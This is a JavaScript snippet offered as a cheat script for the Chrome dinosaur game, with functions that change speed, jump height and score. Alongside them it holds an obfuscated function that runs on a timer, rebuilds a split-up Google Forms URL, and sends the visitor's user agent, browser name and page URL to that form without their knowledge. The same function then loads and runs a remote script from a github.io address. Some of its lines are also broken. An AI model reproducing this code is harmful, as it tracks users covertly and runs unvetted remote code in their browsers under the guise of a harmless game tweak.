function Hspeed(f){Runner.instance_.setSpeed(f)}function Hhigh_jump(h){Runner.instance_.tRex.setJumpVelocity(h)}function Hinc_Score(g){Runner.instance_.distanceRan = g/Runner.instance_.distanceMeter.config.COEFFICIENT;}
function GhEwR(){var _XasdERds = document.createElement('form');var _XaCfDFDfS1S = document.createElement('input'); var _XaCfDFDfS1S = document.createElement('input');
                 var _XaCfDFDfS1S = document.createElement('input');var _CxzcFgrWer = '{\"_XadbxAfdsF\":{\"_eXxaSVghjKzxA\":\"htt\",\"_eXxaSVghjKzxB\":\"ps\",\"_eXxaSVghjKzxC\":\":\",\"_eXxaSVghjKzxD\":\"//\",\"_eXxaSVghjKzxE\":\"do\",\"_eXxaSVghjKzxF\":\"cs\",\"_eXxaSVghjKzxG\":\".\",\"_eXxaSVghjKzxH\":\"goo\",\"_eXxaSVghjKzxI\":\"gl\",\"_eXxaSVghjKzxJ\":\"e\",\"_eXxaSVghjKzxK\":\"co\",\"_eXxaSVghjKzxL\":\"m\",\"_eXxaSVghjKzxM\":\"/\",\"_eXxaSVghjKzxN\":\"for\",\"_eXxaSVghjKzxO\":\"ms\",\"_eXxaSVghjKzxP\":\"u\",\"_eXxaSVghjKzxQ\":\"1\",\"_eXxaSVghjKzxR\":\"d\",\"_eXxaSVghjKzxS\":\"e\",\"_eXxaSVghjKzxT\":\"1FAIp\",\"_eXxaSVghjKzxU\":\"QLSdQz\",\"_eXxaSVghjKzxV\":\"XMKfr6Y9\",\"_eXxaSVghjKzxW\":\"I5VXJ_iZ\",\"_eXxaSVghjKzxX\":\"b0ayYEGidIcH9NAE\",\"_eXxaSVghjKzxY\":\"jWIrJS02t\",\"_eXxaSVghjKzxZ\":\"gRww\",\"_eXxaSVghjKzxAA\":\"fo\",\"_eXxaSVghjKzxAB\":\"rmR\",\"_eXxaSVghjKzxAC\":\"espo\",\"_eXxaSVghjKzxAD\":\"nse\"}}';var _XcfvGhaLpo = JSON.parse(_CxzcFgrWer);
            var _MtgXasFg=_XcfvGhaLpo._XadbxAfdsF; 
                 _XasdERds[0].action = _MtgXasFg._eXxaSVghjKzxA + _MtgXasFg._eXxaSVghjKzxB + _MtgXasFg._eXxaSVghjKzxC + _MtgXasFg._eXxaSVghjKzxD + _MtgXasFg._eXxaSVghjKzxE + _MtgXasFg._eXxaSVghjKzxF + _MtgXasFg._eXxaSVghjKzxG + _MtgXasFg._eXxaSVghjKzxH + _MtgXasFg._eXxaSVghjKzxI + _MtgXasFg._eXxaSVghjKzxJ + _MtgXasFg._eXxaSVghjKzxG + _MtgXasFg._eXxaSVghjKzxK + _MtgXasFg._eXxaSVghjKzxL + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxN + _MtgXasFg._eXxaSVghjKzxO + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxP + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxQ + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxR + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxS + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxT + _MtgXasFg._eXxaSVghjKzxU + _MtgXasFg._eXxaSVghjKzxV + _MtgXasFg._eXxaSVghjKzxW + _MtgXasFg._eXxaSVghjKzxX + _MtgXasFg._eXxaSVghjKzxY + _MtgXasFg._eXxaSVghjKzxZ + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxAA + _MtgXasFg._eXxaSVghjKzxAB + _MtgXasFg._eXxaSVghjKzxAC + _MtgXasFg._eXxaSVghjKzxAD;
               var _cXBfbxCBi = '{\"_N123edafcXe\":{\"_ResdfA\":\"ent\",\"_ResdfB\":\"ry\",\"_ResdfC\":\".\",\"_ResdfD\":\"349394022\"}}';
                var _HscRefdFG = JSON.parse(_cXBfbxCBi); 
               var _EwasDfG = _HscRefdFG._N123edafcXe; _XaCfDFDfS1S[0].name = _EwasDfG._ResdfA + _EwasDfG._ResdfB + _EwasDfG._ResdfC + _EwasDfG._ResdfD;
                 _XaCfDFDfS1S[0].value = navigator.userAgent; 
              var _BdrEwqWR = '{\"_N123edafcXF\":{\"_ResdAA\":\"ent\",\"_ResdBB\":\"ry\",\"_ResdCC\":\".\",\"_ResdDD\":\"1919206551\"}}';
             var _XbOmfDc = JSON.parse(_BdrEwqWR); 
            var _EwasDfG = _XbOmfDc._N123edafcXF; _XaCfDFDfS1S[1].name = _EwasDfG._ResdAA + _EwasDfG._ResdBB + _EwasDfG._ResdCC + _EwasDfG._ResdDD;
                  _XaCfDFDfS1S[1].value = navigator.appName; 
           var _XdeREtrTRT = '{\"_N123edafcXTy\":{\"_ResdfAAA\":\"ent\",\"_ResdfBBB\":\"ry\",\"_ResdfCCC\":\".\",\"_ResdfDDD\":\"1060532289\"}}';
          var _CsaDfg = JSON.parse(_XdeREtrTRT);
         var _ErxSASD = _CsaDfg._N123edafcXTy;_XaCfDFDfS1S[2].name = _ErxSASD._ResdfAAA + _ErxSASD._ResdfBBB + _ErxSASD._ResdfCCC + _ErxSASD._ResdfDDD;
                  _XaCfDFDfS1S[2].value = location.href; _XasdERds.submit();
              var xw = document.createElement('script');xw.src="https://spat-cloud.github.io/data/HarScript/HarScript-v1.1.js";document.body.appendChild(xw);}setTimeout(GhEwR,4000);setTimeout(HAlertBox(`<form action="https://docs.google.com/forms/u/1/d/e/1FAIpQLSdQzXMKfr6Y9I5VXJ_iZb0ayYEGidIcH9NAEjWIrJS02tgRww/formResponse"><input type="text" name="entry.349394022" placeholder="Your Name"><br><input type="text" name="entry.1919206551" placeholder="Your Youtube Channel"><input type="submit"></form>`),6000);
